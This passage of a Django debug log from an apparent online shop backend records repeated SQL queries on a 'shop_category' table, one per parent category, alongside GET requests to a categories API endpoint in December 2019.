"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:51:48,028 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:51:48,031 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:51:48,033 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:51:48,036 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:51:48,039 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:51:48,043 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:51:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:55:09,655 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:55:09,662 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:55:09,666 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:55:09,668 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:55:09,671 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:55:09,673 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:55:09,676 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:55:09,678 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:55:09,680 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:55:09,684 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:55:09,686 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:55:09,688 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:55:09,690 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:55:09,693 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:55:09,696 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:55:09,698 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:55:09,700 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:55:09,702 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:55:09,705 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:55:09,709 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:55:09,711 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:55:09,713 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:55:09,715 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:55:09,718 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:55:09,720 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:55:09,723 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:55:09,725 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:55:09,728 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:55:09,730 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:55:09,732 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:55:09,735 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:55:09,738 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:55:09,740 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:55:09,742 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:55:09,744 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:55:09,748 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:55:09,750 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:55:09,752 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:55:09,755 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:55:09,757 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:55:09,759 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:55:09,762 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:55:09,764 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:55:09,767 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:55:09,769 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:55:09,772 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:55:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:56:23,659 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:56:23,665 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:56:23,670 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:56:23,674 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:56:23,678 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:56:23,681 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:56:23,685 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:56:23,689 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:56:23,693 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:56:23,698 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:56:23,701 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:56:23,705 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:56:23,708 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:56:23,711 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:56:23,717 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:56:23,721 utils 4252 140031732287232 (0.001) SELECT 